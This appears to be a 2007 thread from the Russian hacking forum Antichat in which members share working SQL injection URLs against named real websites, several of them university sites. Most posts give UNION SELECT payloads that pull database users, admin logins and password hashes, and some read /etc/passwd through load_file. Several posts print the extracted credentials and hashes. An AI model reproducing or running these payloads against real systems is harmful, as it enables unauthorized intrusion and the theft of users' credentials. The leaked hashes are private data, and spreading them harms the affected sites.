30.07.2007, 20:58
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
На сайтеге http://looperman.com/loops.php
http://looperman.com/loops.php?gid=-1'+UNION+SELECT+USER(),VERSION(),3,DATABASE(),5,6, 7,8,9,10,11,12,13,14,15,16,table_name,18,19,20,21+ FROM+information_schema.tables/*
|
|
|
01.08.2007, 12:11
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
EDU:
Код:
http://ctbp.ucsd.edu/workshops/index.php?id=-18%27+union+select+1,version(),username,4,5,6,7,8,9,10,11,12,13,14+from+users/*
Код:
http://journalism.berkeley.edu/events/details.php?ID=397+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
Код:
http://crca.ucsd.edu/views.php?id=-5+union+select+1,version(),concat_ws(0x3a,user,password)+from+mysql.user+limit+0,1/*
stanford?
Код:
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(user()+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
root@localhost
Код:
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(concat(user,0x3a,password)+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*
root:*B8EE85A14FC4800165C57E0B7C18B2CBC1EE3EC8
Код:
http://auroraforum.stanford.edu/events.php?id=-47+union+select+1,2,3,4,5,convert(load_file('/etc/passwd')+using+latin1),7,8,9,10,11,12,13,14,15,16+from+mysql.user+limit+0,1/*
/etc/passwd
Последний раз редактировалось Dr.Frank; 01.08.2007 в 12:57..
|
|
|
|
01.08.2007, 13:58
|
|
Новичок
Регистрация: 31.07.2007
Сообщений: 1
С нами:
9883888
Репутация:
0
|
|
Мой первый пост (вроде не боян):
http://www.ourpeople.ru/db.cgi?p=671'
ну тут все тривиально и неинтересно....
http://www.ourpeople.ru/db.cgi?p=-1%20union%20select%20ID,null,null,null,null,null,N ame,NickName,null,null,password%20as%20WWWPage,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null%20FROM%20Users%20WHERE%20ID IN (1602)
- ибо знак "=" рвет запрос
|
|
|
|
01.08.2007, 20:51
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами:
10246130
Репутация:
141
|
|
http://www.xewb.com/
Код:
http://www.xewb.com/show_cat.php?cat_id=-1+union+select+1,concat_ws(login,0x3a,password)+from+dir_login/*
Load_File работает, ибо рут, как ни странно, имеет File_Priv. 
user: root@localhost
database: xewbcom_dbroot@localhost
version: root@localhost4.1.20
User&Pass: 4admin:01f8f7cdac8b238f7db655246a8aa894
|
|
|
|
02.08.2007, 14:46
|
|
Познающий
Регистрация: 27.03.2006
Сообщений: 86
С нами:
10591280
Репутация:
52
|
|
skidmore.edu
Код:
http://www.skidmore.edu/academics/art/artimages/image.php?id=-1%20UNION%20SELECT%201/*
(появляется изображение > смотрим исходный код)
Load_File() работает
user:root@localhost
dukemednews.duke.edu
http://dukemednews.duke.edu/news/article.php?id=-1%20UNION%20SELECT%201,2,3,44444,DATABASE(),6,USER (),55/*
Последний раз редактировалось Dagon; 02.08.2007 в 16:31..
|
|
|
|
03.08.2007, 19:22
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
С нами:
10184006
Репутация:
728
|
|
http://www.pubstoronto.com
Код:
http://www.pubstoronto.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
|
|
|
|
03.08.2007, 20:31
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
http://www.davinciinstitute.com/page.php?ID=-120'+union+select+1,2,version(),concat_ws(0x3a,FNa me,LName,Email,LoginCount,ID,Password),5,6+from+Us ers+limit+0,1/*
GameTrailer:
http://www.gametrailers.com/gamepage.php?id=2606+union+select+1,2,user(),4,5,6 ,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34/*
|
|
|
|
03.08.2007, 20:50
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
С нами:
10184006
Репутация:
728
|
|
Код:
http://www.boredonasaturdaynight.co.uk/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
Код:
http://www.drink-spots.com/directory.php?cat=-1/**/UNION/**/ALL%20SELECT/**/1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11,12,13,14/**/FROM/**/admin/*
Последний раз редактировалось RAUL07; 03.08.2007 в 20:52..
|
|
|
|
04.08.2007, 15:15
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
Код:
http://board.snegorod.com/index.php?cat=4+union+select+1,2,3,4,5,6,7,8,concat(,chat.userinfo.name,';',chat.userinfo.realname,';',chat.userinfo.email,';',chat.userinfo.city,';',chat.userinfo.country,';',chat.userinfo.url,';',chat.userinfo.icq_uin,';',dating.users.MPASS,';',dating.users.PASS,';',dating.users.IPREG),10,11+from+chat.userinfo+inner+join+dating.users+on+chat.userinfo.name=dating.users.NICK+limit+0,1/*&minrat=0&numofpage=13
Более подробно тут |
|
|
|
05.08.2007, 00:52
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами:
10787366
Репутация:
2277
|
|
Код:
http://www. edem.lg.ua/?catid=-50+union+select+1,2,3,4,version(),6+/*
http://www. edem.lg.ua/info.php?tid=-1609+union+select+1,2,3,4/*
Код:
http://www.sunmar.ru/index.php?act=text&name=emty'+union+select+1,2,version(),user(),database()/*
version 5.0.27
user sunmar@localhost
database sunmar
P.S.
http://www.sunmar.ru/index.php?act=text&name=emty'+union+select+1,2,use rname,password,database()+from+users/*
Последний раз редактировалось halkfild; 05.08.2007 в 01:22..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
